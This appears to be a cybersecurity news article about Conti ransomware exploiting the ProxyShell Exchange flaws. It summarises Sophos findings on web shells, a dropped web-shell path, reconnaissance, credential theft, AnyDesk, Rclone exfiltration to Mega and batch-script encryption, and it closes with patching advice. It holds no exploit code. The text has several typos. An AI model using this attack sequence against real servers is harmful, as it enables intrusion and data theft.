Researchers uncovered a new ongoing attack by Conti Ransomware Gang that utilized the ProxyShell to target the organization networks.
ProxySell is an exploit written to abuse the Microsoft Exchange vulnerabilities reported over the past months, also it was patched by Microsoft and released an update in May 2021 under patch Tuesday.
Conti is one of the ruthless ransomware gangs, and The FBI reported that the gang was involved with more than 400 high-profile cyber attacks with demands as high as $25 million.
.png
)
New ProxySell attack is employed by the Ransomware groups, and the same exploit was already utilized by the LockFile ransomware, now it is used by the Conit Ransomware.
Researchers from Sophos believe that the attackers have gained experience with the techniques, their dwell time before launching the final ransomware payload on target networks.
Also Conti ransomware gain access to the targeted network under a minute and set up a remote Web Shell. Following this, they installed a second web shell that acts as a backup.
30 min later, Attackers generate a complete list of computers deployed in the targeted network, domain controller, and domain admins.
To execute the commands, it takes an hour to obtain the credentials of the domain administrator accounts, in another 48 hours, they exfiltrated about 1 Terabyte of data, and finally, they deployed the Conti ransomware to every machine on the network within 48 hours.
Technical Analysis
A Chain of Microsoft exchange vulnerabilities(CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) was fixed in the recent April, May Exchange Server cumulative update, which leads to the organization upgrade their exchange server.
But some of the organizations leaving the exchange server without applying the patch due to email downtime, and it leaves them to attackers who used to scan the vulnerable systems.
Once the attackers successfully entered into the network, attackers create a new mailbox for “administrator,” and placing a new role with the help of Microsoft Exchange “cmdlets that help them to execute the Shell commands remotely.
\\127.0.0.1\C$\inetpub\wwwroot\aspnet_client\aspnetclient_log.aspx
Later, the attackers create a web shell in the localhost address of the sever and execute a PowerShell script which is encoded in base64.
In the next stage, attack utilizing the encoded command to abuses Service Control Manager to execute a directory look-up on the directory where the web shell was dropped.
In the Reconnaissance Phase, attackers another PowerShell command to retrieving the list of domain computers from the text file and collect the information about the network configuration, domain administrators, users actively connected to the system, process ID of the Local Security Authority Subsystem Service. Sophos said.
Once they have collected the all necessary data, the attacker dropped an executable file (SVN.exe) and executed it on the system then establish a connection to the C2 server which is placed in Finland.
Once the initial stage of compromise was done, attackers stealing the credentials then began lateral movement using an existing domain administrator account that they had cracked.
“That account was used to create an RDP connection from the Exchange server to another server. One minute later, the logs of that server show the domain admin account downloading and installing the AnyDesk remote desktop software as a service.”
Finally, attackers deployed the File copying utility called Rclone in multiple servers with the help of PowerShell file.
Later the date has been transferring to the Mega file-sharing service that includes addresses of remote drives and the username & password for that account.
Exactly 5th day since the intimal compromiseConti actors began deploying ransomware and start the encrypt the files.
“Four batch scripts (called 1help.bat, 2help.bat, 3help.bat, and 4help.bat) were run from four servers. The batch files repeatedly invoked the ransomware executable (x64.exe), with each iteration targeting specific drives on every Windows system on the network by their default file sharing names “
ProxyShell and other attacks on known Microsoft Exchange vulnerabilities are extremely high now. Organizations are recommended to update and patch servers on-premises Exchange Server as soon as is possible.
Here are the recently released updates with the patches for the Microsoft Exchange server.
You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity and hacking news updates.
